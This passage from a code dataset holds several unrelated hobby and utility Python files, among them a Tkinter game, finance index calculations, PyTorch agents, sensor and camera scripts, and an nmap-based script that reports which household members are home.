cv2.waitKey(10)\n", "sub_path": "muke_OpenCV/01几何变换/14_图片旋转.py", "file_name": "14_图片旋转.py", "file_ext": "py", "file_size_in_byte": 644, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "437293832", "text": "\ntry:\n    # for Python2\n    from 
Tkinter import * ## notice capitalized T in Tkinter\nexcept ImportError:\n # for Python3\n from tkinter import * ## notice lowercase 't' in tkinter here\n\nroot = Tk()\n\n\"\"\"\n.Main File that determines paths\n\"\"\"\n\nimport PIL\nfrom PIL import Image, ImageDraw, ImageTk\n\n\n# Imported module functions\nfrom start import *\n\n\n\nclass GuessingGame:\n def __init__(self, master):\n self.master = master\n # Title of page\n master.title(\"The Golden Carrot\")\n\n # Main Text\n self.message = \"The Golden Carrot\"\n self.label_text = StringVar()\n self.label_text.set(self.message)\n self.label = Label(master, textvariable=self.label_text)\n self.label.grid(row=0, column=0, columnspan=2, sticky=W + E)\n self.label.config(background=\"#d8dad9\", height=20, width=60)\n\n # Bunny Name\n self.b_name = \"Bunny\"\n self.label_bun = StringVar()\n self.label_bun.set(self.b_name)\n self.bun = Label(master, textvariable=self.label_bun)\n\n\n # Main 2 Buttons\n self.yes_button = Button(master, text=\"Continue\", command=self.introductions)\n self.no_button = Button(master, text=\"Back\", state=DISABLED)\n self.name = Entry(master)\n self.name.config(highlightbackground=\"#d8dad9\", highlightcolor=\"#d8dad9\")\n self.no_button.grid(row=2, column=0, sticky=W + E)\n self.no_button.config(highlightbackground=\"#d8dad9\", highlightcolor=\"#d8dad9\")\n self.yes_button.grid(row=2, column=1, sticky=W + E)\n self.yes_button.config(highlightbackground=\"#d8dad9\", highlightcolor=\"#d8dad9\")\n\n # Items\n self.items = ['lettuce', 'a pebble']\n\n # Drawing\n self.top = Toplevel()\n self.c = Canvas(self.top, bg='white', width=600, height=600)\n self.top.wm_title(\"Draw \" + self.label_bun.get())\n self.c.grid(row=1, columnspan=5)\n self.image1 = PIL.Image.new('RGB', (600, 600), '#d8dad9')\n self.save_button = Button(self.top, text='save', command=self.use_save)\n self.save_button.grid(row=0, column=1)\n self.drawing_setup()\n self.top.withdraw()\n\n # Save Drawing\n def use_save(self, *args):\n self.filename = 'drawing.png'\n self.image1.save(self.filename)\n self.image2 = ImageTk.PhotoImage(Image.open(\"drawing.png\").resize((200, 200)))\n self.image3 = Label(root, image=self.image2)\n self.image3.config(background=\"#d8dad9\")\n self.image3.grid_remove()\n self.top.withdraw()\n\n # Imported module functions\n introductions = introductions\n question_one = question_one\n question_one_yes = question_one_yes\n question_one_end = question_one_end\n question_one_no = question_one_no\n stage_one = stage_one\n create_window = create_window\n stage_two = stage_two\n stage_three = stage_three\n drawing_setup = drawing_setup\n paint = paint\n reset = reset\n stage_three_fail = stage_three_fail\n stage_four = stage_four\n stage_five = stage_five\n item_list = item_list\n\nmy_gui = GuessingGame(root)\nroot.config(background=\"#f0f5f5\", padx=20, pady=20)\nroot.mainloop()\n", "sub_path": "Bunny Tkinter App/main_file.py", "file_name": "main_file.py", "file_ext": "py", "file_size_in_byte": 3163, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "PIL.Image.new", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": 
"name"}]} +{"seq_id": "358895856", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# author: Xiaohan Li\n# info: 计算各指数等权PE和PB\n\n\nimport sys\nimport os\nimport traceback\nimport pandas as pd\nimport numpy as np\nimport sqlite3 as sq\nfrom datetime import *\nfrom dateutil.relativedelta import *\n\nimport Common\nimport EvalUtils\nimport SqliteUtils\n\n\ndef run(CONFIG, opts, args):\n sqConn = sq.connect(CONFIG['sqlite.path'])\n\n calcDays = int(os.getenv('CALC_DAYS', '30'))\n fillMiss = os.getenv('FILL_MISS', 'False')\n today = datetime.date(datetime.now())\n\n # 指定某个基金代码,计算这个指数的等权PE和PB\n indexCode = os.getenv('INDEX_CODE', None)\n if indexCode:\n indexLst = [indexCode]\n else:\n print('Get all index PE')\n df = pd.read_csv('./data/index.csv')\n indexLst = df['index_code'].values.tolist()\n\n startDay = today - relativedelta(days = calcDays)\n # 从1995年开始计算PE和PB,与E大的图保持统一\n if startDay < date(1995, 1, 1):\n startDay = date(1995, 1, 1)\n firstDay = startDay.replace(day = 1)\n print('Calculate index PE from: %s' % firstDay)\n firstDayStr = firstDay.strftime('%Y%m%d')\n endDay = today.replace(day = 1)\n allEvalDF = SqliteUtils.getConEval(sqConn, firstDayStr)\n print(allEvalDF.head(3))\n print(allEvalDF.dtypes)\n for indexCode in indexLst:\n print(indexCode)\n firstConLst = None\n firstValidDay = None\n conDF = SqliteUtils.getConOfIndex(sqConn, indexCode)\n print(conDF.head(3))\n day = firstDay\n while day <= endDay:\n intDay = int(datetime.strftime(day, '%Y%m%d'))\n conLst = EvalUtils.getConLst(conDF, indexCode, intDay)\n if len(conLst)>0 and firstConLst == None:\n firstConLst = conLst\n firstValidDay = day\n conEvalDF = allEvalDF[((allEvalDF.trade_dt == intDay)\n & allEvalDF['con_code'].isin(conLst))]\n # print(len(conEvalDF))\n if len(conEvalDF) > 0:\n dayPE = EvalUtils.calcPEWoNeg(conEvalDF)\n dayPB = EvalUtils.calcPBWoNeg(conEvalDF)\n # print('%s %.2f' % (day, dayPe))\n dayDF = pd.DataFrame([[intDay, dayPE, dayPB]], columns=['dt', 'pe', 'pb'])\n SqliteUtils.writeIndexEwEval(sqConn, dayDF, indexCode)\n day = day + relativedelta(months = 1)\n \n # fill 10 years' pe before firstValidDay\n if fillMiss == 'False':\n print('do not fill')\n continue\n elif fillMiss == 'True':\n print(indexCode, 'First valid day',firstValidDay,\n 'len of firstConLst', len(firstConLst))\n day = firstValidDay - relativedelta(years=10)\n # 主要是行业指数需要补齐,补齐至2005年,与E大保持一致\n if day < date(2005, 1, 1):\n day = date(2005, 1, 1)\n print('fill from', day)\n while day <= firstValidDay:\n intDay = int(datetime.strftime(day, '%Y%m%d'))\n conEvalDF = allEvalDF[((allEvalDF.trade_dt == intDay)\n & allEvalDF['con_code'].isin(firstConLst))]\n if len(conEvalDF) > 0:\n # print(day, 'len of conEvalDF', len(conEvalDF))\n dayPE = EvalUtils.calcPEWoNeg(conEvalDF)\n dayPB = EvalUtils.calcPBWoNeg(conEvalDF)\n # print('%s %.2f' % (day, dayPe))\n dayDF = pd.DataFrame([[intDay, dayPE, dayPB]], columns=['dt', 'pe', 'pb'])\n SqliteUtils.writeIndexEwEval(sqConn, dayDF, indexCode)\n else:\n print('empty con eval', indexCode, day)\n day = day + relativedelta(months=1)\n\n\n\nif __name__ == \"__main__\":\n try:\n (CONFIG, opts, args) = Common.process_options()\n run(CONFIG, opts, args)\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n print(\"Job Error %s:\" % (e.args))\n raise e\n finally:\n pass\n", "sub_path": "index-eval/bin/CalcIndexPEAndPB.py", "file_name": "CalcIndexPEAndPB.py", "file_ext": "py", "file_size_in_byte": 4099, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", 
"pt": "32", "api": [{"api_name": "sqlite3.connect", "line_number": 23, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 25, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 27, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "SqliteUtils.getConEval", "line_number": 46, "usage_type": "call"}, {"api_name": "SqliteUtils.getConOfIndex", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.strftime", "line_number": 57, "usage_type": "call"}, {"api_name": "EvalUtils.getConLst", "line_number": 58, "usage_type": "call"}, {"api_name": "EvalUtils.calcPEWoNeg", "line_number": 66, "usage_type": "call"}, {"api_name": "EvalUtils.calcPBWoNeg", "line_number": 67, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "SqliteUtils.writeIndexEwEval", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.strftime", "line_number": 86, "usage_type": "call"}, {"api_name": "EvalUtils.calcPEWoNeg", "line_number": 91, "usage_type": "call"}, {"api_name": "EvalUtils.calcPBWoNeg", "line_number": 92, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 94, "usage_type": "call"}, {"api_name": "SqliteUtils.writeIndexEwEval", "line_number": 95, "usage_type": "call"}, {"api_name": "Common.process_options", "line_number": 104, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 107, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 107, "usage_type": "attribute"}]} +{"seq_id": "256959863", "text": "import torch\nimport random\n\n\nclass Softmax_Agent(torch.nn.Module):\n def __init__(self, model=None, batch=128, head=None):\n super(Softmax_Agent, self).__init__()\n self.model = model\n self.n_agents = 1\n self.batch = batch\n self.transition_keys = [\"state\", \"action\", \"reward\", \"logit\", \"entropy\", \"value\"]\n self.p_state = 0\n self.single_step = False\n self.head = head\n self.steps = 0\n self.action = -1\n\n def step(self, x, memory, confidence, render, explore=False):\n ys = []\n infos = {}\n\n y, logit, entropy = self.forward(x, confidence, render, explore)\n memory.add_value((\"logit\",logit[0]))\n memory.add_value((\"entropy\",entropy[0]))\n self.steps += 1\n return y, infos\n\n def forward(self, x, confidence=1.0, render=False, explore=False):\n actions = []\n logits = []\n entropies = []\n\n if type(self.p_state) != torch.tensor:\n x = torch.cat((x, x),dim=1)\n else:\n x = torch.cat((x, self.p_state),dim=1)\n\n self.p_state = x\n\n y = self.model(x)\n\n if self.head != None:\n y = self.head(y.view(self.n_agents,-1))\n\n y = torch.nn.Softmax(dim=1)(y.view(self.n_agents,-1))\n\n for z in list(y):\n dist = torch.distributions.Categorical(z)\n anxiety = torch.nn.Sigmoid()(torch.randn(1))\n\n if confidence < anxiety or self.steps < 1:\n self.action = dist.sample()\n confidence = 5.0\n mode = \"Explore\"\n else:\n if explore:\n pass\n else:\n self.action = torch.argmax(dist.probs)\n mode = \"Exploit\"\n\n #if render:\n # print(\"{}% Action {}\".format(int(100*y[0][action]), action))\n\n logit = -dist.log_prob(self.action).view(-1)\n logits.append(logit)\n actions.append(self.action)\n entropies.append(dist.entropy())\n if self.single_step:\n print(\"Step:{} Action:{} Prob:{} 
LogProb:{} Confidence:{} Mode:{}\".format(self.steps, self.action, z[self.action], logit, confidence, mode))\n input()\n\n return actions, logits, entropies\n\nclass Softmax_RNN_Agent(torch.nn.Module):\n def __init__(self, in_features, hidden, layers, model=None, batch=128, n_agents=1):\n super(Softmax_RNN_Agent, self).__init__()\n self.model = model\n self.hidden_size = hidden\n self.layers = layers\n self.rnn = torch.nn.GRU(in_features, hidden, layers)\n self.memory = []\n self.n_agents = n_agents\n self.batch = batch\n self.transition_keys = [\"state\", \"action\", \"reward\", \"logit\", \"entropy\", \"value\"]\n self.p_state = 0\n self.hidden = torch.zeros(self.layers, 1, self.hidden_size)\n\n def push(self, transition):\n self.memory.push(transition)\n\n def step(self, x, memory):\n ys = []\n infos = {}\n\n y, logit, entropy = self.forward(x)\n memory.add_value((\"logit\",logit[0]))\n memory.add_value((\"entropy\",entropy[0]))\n return y, infos\n\n def forward(self, x):\n actions = []\n logits = []\n entropies = []\n\n if type(self.p_state) != torch.tensor:\n x = torch.cat((x, x),dim=1)\n else:\n x = torch.cat((x, self.p_state),dim=1)\n\n self.p_state = x\n y,self.hidden = self.rnn(x, self.hidden)\n y = self.model(y)\n\n y = torch.nn.Softmax(dim=2)(y)\n\n for z in list(y):\n dist = torch.distributions.Categorical(z)\n action = dist.sample()\n logit = -dist.log_prob(action).view(-1)\n logits.append(logit)\n actions.append(action)\n entropies.append(dist.entropy())\n\n return actions, logits, entropies\n\n def reset_hidden(self):\n self.hidden = torch.zeros(self.layers, 1, self.hidden_size)\n\nclass RandomAgent():\n def __init__(self, actions):\n super(RandomAgent, self).__init__()\n self.actions = actions\n self.transition_keys = [\"state\",\"reward\",\"action\"]\n\n def forward(self, x):\n return (random.choice(range(self.actions)))\n", "sub_path": "agents.py", "file_name": "agents.py", "file_ext": "py", "file_size_in_byte": 4277, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.distributions.Categorical", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn.Sigmoid", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torch.nn.GRU", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 115, "usage_type": "call"}, 
{"api_name": "torch.nn", "line_number": 115, "usage_type": "attribute"}, {"api_name": "torch.distributions.Categorical", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 118, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "209740820", "text": "# -*- coding: utf-8 -*-\n\nimport requests\nimport unittest\n\nclass test_kuaidi(unittest.TestCase):\n def setUp(self):\n self.header={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',}\n \n danhao = '494452070742'\n kd = 'zhongtong'\n self.url = 'http://www.kuaidi.com/index-ajaxselectcourierinfo-%s-%s.html'%(danhao, kd)\n \n \n def testsearch(self):\n r = requests.get(self.url, headers=self.header, verify=False)\n date = r.json()\n print(date)\n self.assertEqual(date['company'], '中通快递')\n ", "sub_path": "interface/src/test/test_seacrhkuaidi.py", "file_name": "test_seacrhkuaidi.py", "file_ext": "py", "file_size_in_byte": 620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "120057985", "text": "#the Python Script was provided by : Jonathan De La Cruz https://www.linkedin.com/in/jonathandelacruz96/\r\n\r\n\r\nimport re\r\nimport subprocess\r\nimport time\r\nimport serial\r\nwhile True:\r\n dylan = 1\r\n lewis = 1\r\n lydia = 1\r\n justin = 1\r\n adr = []\r\n ser = serial.Serial('/dev/ttyUSB0') #serial\r\n # this runs commands in terminal that use nmap to print all terminal results into output.txt\r\n with open('output.txt', 'w') as f:\r\n p1 = subprocess.run(['sudo', 'nmap', '-sP', '***.*.*.0/**'], stdout=f, text=True)#i use stars to blank out my actual IP, replace with you own\r\n with open('output.txt', 'r') as searchFile:\r\n for line in searchFile:\r\n if 'MAC' in line:\r\n adr.append(line.rstrip('\\n'))\r\n with open('macAddresses.txt', 'w') as macFile:\r\n for mac in adr:\r\n macFile.write('%s\\n' %mac[:30])\r\n time.sleep(10) \r\n with open('macAddresses.txt', 'r') as macFile:\r\n time.sleep(2)\r\n with open('macAddresses.txt', 'r') as macFile:\r\n print('checking who is home...')\r\n for line in macFile:\r\n if '**:**:**:**:**:**' in line: #i use **:**:**:**:**:** to replace a real MAC address, replace with you own\r\n dylan = 2\r\n print('Dylan is here') #change this to whatever you want to happen\r\n ser.write(b'D') #sends character cast as byte over serial\r\n if dylan == 1 :\r\n print(' Dylan is not here') #change this to whatever you want to happen\r\n ser.write(b'd') #sends character cast as byte over serial\r\n time.sleep(2)\r\n with open('macAddresses.txt', 'r') as macFile:\r\n for line in macFile:\r\n if '**:**:**:**:**:**' in line:#i use **:**:**:**:**:** to replace a real MAC address, replace with you own\r\n lewis = 2\r\n print('Lewis is here') #change this to whatever you want to happen\r\n ser.write(b'L') #sends character cast as byte over serial\r\n if lewis == 1:\r\n print(' Lewis is not here') #change this to whatever you want to happen\r\n ser.write(b'l') #sends character cast as byte over serial\r\n time.sleep(2)\r\n with open('macAddresses.txt', 'r') as macFile:\r\n for line in macFile:\r\n if '4**:**:**:**:**:**' in line:#i use **:**:**:**:**:** to replace a real MAC address, 
replace with you own\r\n lydia = 2\r\n print('Lydia is here') #change this to whatever you want to happen\r\n ser.write(b'K') #sends character cast as byte over serial\r\n if lydia == 1 : \r\n print(' lydia is not here') #change this to whatever you want to happen\r\n ser.write(b'k') #sends character cast as byte over serial\r\n time.sleep(2)\r\n with open('macAddresses.txt', 'r') as macFile:\r\n for line in macFile:\r\n if '**:**:**:**:**:**' in line:#i use **:**:**:**:**:** to replace a real MAC address, replace with you own\r\n justin = 2\r\n print('Justin is here') #change this to whatever you want to happen\r\n ser.write(b'J') #sends character cast as byte over serial\r\n if justin == 1 :\r\n print(' justin is not here') #change this to whatever you want to happen\r\n ser.write(b'j') #sends character cast as byte over\r\n time.sleep(2)\r\n print('end of loop')\r\n ser.close()\r\n time.sleep(10)", "sub_path": "Python/whoishomescript.py", "file_name": "whoishomescript.py", "file_ext": "py", "file_size_in_byte": 3838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "serial.Serial", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "372254409", "text": "import serial #Import Serial Library\nimport time\nimport datetime\nimport csv\nimport numpy as np\n\nrun = '1'\ncount = 0\nbadSamples = 0\nNO_SAMPLES = 1000\nNO_SENSORS = 1\nSTART = 'S'\n\nHEADER = [ ['Sensor 1',' ',' ','Sensor 2',' ',' ','Sensor 3',' ',' ','Sensor 4',' ',' ','Sensor 5'],\n ['X','Y','Z','X','Y','Z','X','Y','Z','X','Y','Z','X','Y','Z'] ]\n\ndata_log = []\nlength = []\n\ntry:\n arduinoSerial = serial.Serial('/dev/tty.usbserial-DN018OOF',9600, 5) #Create Serial port object called arduinoSerialData\n print(\"Connected to Arduino\")\nexcept:\n print(\"Failed to connect to Arduino\")\n\narduinoSerial.reset_input_buffer()\narduinoSerial.reset_output_buffer()\ntime.sleep(5) #Required for the XBee's to initialise\n\ninput('Please press Enter to begin')\narduinoSerial.write(b'S')\n\nwhile (run == '1'):\n\t# If the input buffer is not empty read the data out into rawData using \\n as a delimiter.\n if (arduinoSerial.inWaiting()>0):\n rawData = arduinoSerial.readline()\n # Decode the bytes into a string\n data = rawData.decode()\n # Split the ID, x, y, z and newline values and put in a list\n data_readings = data.split(\" \", 5)\n print(data_readings)\n if (len(data_readings) == 5 and '' not in data_readings):\n int_data_readings = list(map(int,data_readings[:4]))\n data_log.append(int_data_readings)\n else:\n badSamples += 1\n\n # Take NO_SAMPLES samples then possibility to quit\n if (count == NO_SAMPLES):\n print('Lost Samples: ' + str(badSamples))\n run = input('Continue? 
(1:yes, 0:no)')\n count = 0\n count += 1\n\narduinoSerial.write(b'S')\narduinoSerial.close()\n\nnp_data_log = np.array(data_log)\n\nfor i in range(1,NO_SENSORS+1):\n length.append((np_data_log == i).sum())\n\nnp_difference = max(length) - np.array(length)\n\nfor i in range(0,NO_SENSORS):\n if (np_difference[i] != 0):\n for j in range(0,np_difference[i]):\n np_data_log = np.concatenate((np_data_log,[[i+1,0,0,0]]), axis=0)\n\nnp_data_sorted = np_data_log[:,[1,2,3]][np_data_log[:,0] == 1 ]\nfor i in range(2,NO_SENSORS+1):\n np_temp = np_data_log[:,[1,2,3]][np_data_log[:,0] == i ]\n np_data_sorted = np.concatenate((np_data_sorted,np_temp), axis=1)\n\ntimestamp = datetime.datetime.utcnow()\npathTime = '/Users/Angelo555uk/Desktop/University/Year_4/Project/Results/Sensor1log-{:%d%b,%H.%M}.csv'.format(timestamp)\n\npath = '/Users/Angelo555uk/Desktop/University/Year_4/Project/Results/Sensorlog.csv'\n\nwith open(path, 'w') as csv_file:\n csv_write = csv.writer(csv_file, dialect='excel')\n csv_write.writerows(HEADER)\n csv_write.writerows(np_data_sorted)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "Python/Serial_Test_MultiV2.py", "file_name": "Serial_Test_MultiV2.py", "file_ext": "py", "file_size_in_byte": 2697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "serial.Serial", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 73, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "189533869", "text": "#!/usr/bin/env python3\n\nimport json\n\nfor file in ('binaries.json', 'binaries-prange.json',\n 'binaries-newspaper-pdf.json', 'binaries-newspaper-tiff.json'):\n\n c = {}\n\n with open(file, 'r') as fd:\n j = json.load(fd)\n\n for result in j['results']['bindings']:\n subject = result['subject']['value']\n size = int(result['size']['value'])\n\n if subject not in c:\n c[subject] = 0\n\n c[subject] += size\n\n\n l = sorted(c.items(), reverse=True, key=lambda x: x[1])\n\n total = 0\n print(file)\n for subject, size in l[:10]:\n print(subject, size)\n total += size\n print(f'total={total}')\n\n", "sub_path": "fcrepo/binaries.py", "file_name": "binaries.py", "file_ext": "py", "file_size_in_byte": 688, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.load", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "412177926", "text": "# import the necessary packages\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport time\nimport cv2\nimport numpy as np\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\ncamera.rotation = 180\ncamera.resolution = (640, 480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=(640, 480))\n\nhog = cv2.HOGDescriptor()\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\n\nout = cv2.VideoWriter(\n 'output.avi',\n cv2.VideoWriter_fourcc(*'MJPG'),\n 15.,\n (640,480))\n# allow the camera to 
warmup\ntime.sleep(0.1)\n# capture frames from the camera\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n # grab the raw NumPy array representing the image, then initialize the timestamp\n # and occupied/unoccupied text\n image = frame.array\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n # detect people in the image\n # returns the bounding boxes for the detected objects\n boxes, weights = hog.detectMultiScale(image, winStride=(8,8) )\n\n boxes = np.array([[x, y, x + w, y + h] for (x, y, w, h) in boxes])\n\n for (xA, yA, xB, yB) in boxes:\n # display the detected boxes in the colour picture\n cv2.rectangle(image, (xA, yA), (xB, yB),\n (0, 255, 0), 2)\n \n # Write the output video \n out.write(image.astype('uint8'))\n # show the frame\n cv2.imshow(\"Frame\", image)\n \n \n \n key = cv2.waitKey(1) & 0xFF\n # clear the stream in preparation for the next frame\n rawCapture.truncate(0)\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n \ncamera.close()\nout.release()", "sub_path": "drone/RegCamFeed.py", "file_name": "RegCamFeed.py", "file_ext": "py", "file_size_in_byte": 1710, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "picamera.PiCamera", "line_number": 9, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.HOGDescriptor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.HOGDescriptor_getDefaultPeopleDetector", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "517669437", "text": "import functools\nimport time\n\ndef metric(fn):\n @functools.wraps(fn)\n def decorator(*args, **kw):\n t1 = time.time()\n result = fn(*args, **kw)\n t2 = time.time()\n print('%s executed in %s ms' % (fn.__name__, t2-t1))\n return result\n return decorator\n\n@metric\ndef fast(x, y):\n time.sleep(0.0012)\n return x + y;\n\n@metric\ndef slow(x, y, z):\n time.sleep(0.1234)\n return x * y * z;\n\nf = fast(11, 22)\ns = slow(11, 22, 33)\nif f != 33:\n print('测试失败!')\nelif s != 7986:\n print('测试失败!')\n\n\n#-----------------------------------------------\ndef ablog(fn):\n def func2():\n print('before call')\n result = fn()\n print('after call')\n return result\n return func2\n \n@ablog\ndef demod():\n print('I\\'m demod')\n\ndemod()", "sub_path": "decorator.py", "file_name": "decorator.py", "file_ext": "py", "file_size_in_byte": 808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 7, "usage_type": "call"}, {"api_name": "time.time", "line_number": 9, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 5, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 16, "usage_type": "call"}, {"api_name": 
"time.sleep", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "616112163", "text": "#!/usr/bin/env python\n#\n# Copyright (C) 2018 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport logging\nimport os\n\nfrom vts.runners.host import asserts\nfrom vts.runners.host import base_test\nfrom vts.runners.host import const\nfrom vts.runners.host import keys\nfrom vts.runners.host import test_runner\nfrom vts.utils.python.os import path_utils\n\n\nclass VtsKernelNetTest(base_test.BaseTestClass):\n \"\"\"Host test class to run android kernel unit test.\n\n Attributes:\n dut: AndroidDevice, the device under test.\n shell: AdbProxy, instance of adb shell.\n host_bin_path: string, path to test binary on the host.\n target_bin_path: string, path to test binary on the target.\n \"\"\"\n\n def setUpClass(self):\n required_params = [\n keys.ConfigKeys.IKEY_DATA_FILE_PATH,\n ]\n self.getUserParams(required_params)\n logging.info('%s: %s', keys.ConfigKeys.IKEY_DATA_FILE_PATH,\n self.data_file_path)\n\n self.dut = self.android_devices[0]\n self.shell = self.dut.adb.shell\n\n # 32-bit version of the test should only run against 32-bit kernel;\n # same for 64 bit.\n bin_path = ('nativetest64' if self.dut.is64Bit else 'nativetest',\n 'kernel_net_tests', 'kernel_net_tests')\n\n self.host_bin_path = os.path.join(self.data_file_path, 'DATA', *bin_path)\n self.target_bin_path = 